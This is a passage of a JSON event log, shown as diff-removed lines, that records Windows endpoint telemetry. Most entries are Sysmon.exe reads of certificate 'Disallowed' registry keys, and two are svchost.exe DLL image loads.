"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", 
- "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "pcwum.dll", - "image_path": "C:\\Windows\\System32\\pcwum.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 